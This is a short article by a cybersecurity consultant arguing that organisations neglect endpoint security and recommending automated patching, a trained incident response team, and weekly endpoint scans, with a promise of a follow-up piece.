There is no doubt that the cybersecurity threat landscape is changing on a daily basis. It seems like that hardly one type of attack comes out, new variants of it are launched at a subsequent point in time. There is no doubt that it is difficult to keep up with this cat and mouse game, literally giving the IT staff of any organisation a serious run for their money.
Remember, the cyber attacker of today is in no rush to launch their threat vectors. As opposed to their “smash and grab” style from some time ago, they are now taking their time to select, profile, and carefully study their potential victims. This is done in an effort to find any unknown vulnerabilities and weaknesses, so that they can stay for much longer periods in the confines of their victim.
Then, once they are in, they can accomplish their specific objectives, bit by bit, unbeknownst to their victim, until it is too late. But very often, businesses and corporations only think of protecting of what lies within their IT infrastructure. For example, this includes the servers, the workstations, the network connections, wireless devices, etc.
The need for endpoint security
Very often, little attention is paid to fortifying the lines of defence of the endpoints of these systems. For instance, a CIO or a CISO is probably more concerned with securing the lines of network communications by using a VPN, rather than the starting and ending points of it. In this aspect, the cyber attacker is aware of this, and is starting to take full advantage of it in order get in and stay in for as long as they can.
Thus, as one can see, securing the endpoints of an IT infrastructure is becoming of paramount importance. In this article, we examine some of the latest, best practices that an organisation can take to further enhance their endpoint security.
The best practices
Here is what is recommended:
1) Make use of automated patching software:
One of the first cardinal rules of security in general is to have your IT staff to stay on top of the latest software upgrades and patches. In fact, there will be some experts that will claim that you should even have a dedicated individual to handle this task. Perhaps if your organisation is a Smaller to Medium sized Business (SMB), this could be possible. But even then, this can be quite a laborious and time-consuming process. But what about those much larger entities that perhaps have multiple IT environments and thousands of workstations and servers? Obviously, the number of endpoints that you will have to fortify can multiply very quickly. Thus, it is highly recommended that you have a process is place that can automatically look for the relevant patches and upgrades, as well as download and deploy them.
2) Have a well-trained and very proactive cyber response team:
Once your organisation has been impacted by a cyber attack, there is no time to waste. Every minute and second that is lost just delays your recovery that much more. Therefore, you need to have a dedicated cyber response team whose primary function is to respond and mitigate the impacts of a cyber attack within a 48-hour time span, at the very maximum. To do this, they must be well trained, and practice on a regular basis (at least once or twice a month) to real world scenarios. They also must be equipped with the latest security tools to determine if there are any other security weaknesses or vulnerabilities that have not been discovered yet. This primarily involves finding and ascertaining any malicious behaviour or abnormal trends that are occurring from within the IT infrastructure. Also, the cyber response team needs to have a dynamic alert and warning system in place to notify them of any potential security breaches, especially at the endpoints.
3) Perform routine security scans on your endpoints:
Just as important it is to maintain a routine schedule for keeping up to date with software upgrades and patches, the same holds true as well for examining the state of the endpoints in your IT infrastructure. In fact, it should be the duty of the network administrator to formulate such a schedule, and this should include conducting exhaustive checks for any signs of potential malware. Sophisticated antivirus software needs to be deployed at the endpoints and maintained regularly. As a rule of thumb, it is recommended that these endpoint security scans should be conducted on a weekly basis.
Our next article will continue to examine the topic of the importance of endpoint security.
Ravi Das is a Cybersecurity Consultant and Business Development Specialist. He also does Cybersecurity Consulting through his private practice, RaviDas Tech, Inc. He also possesses the Certified in Cybersecurity (CC) cert from the ISC2.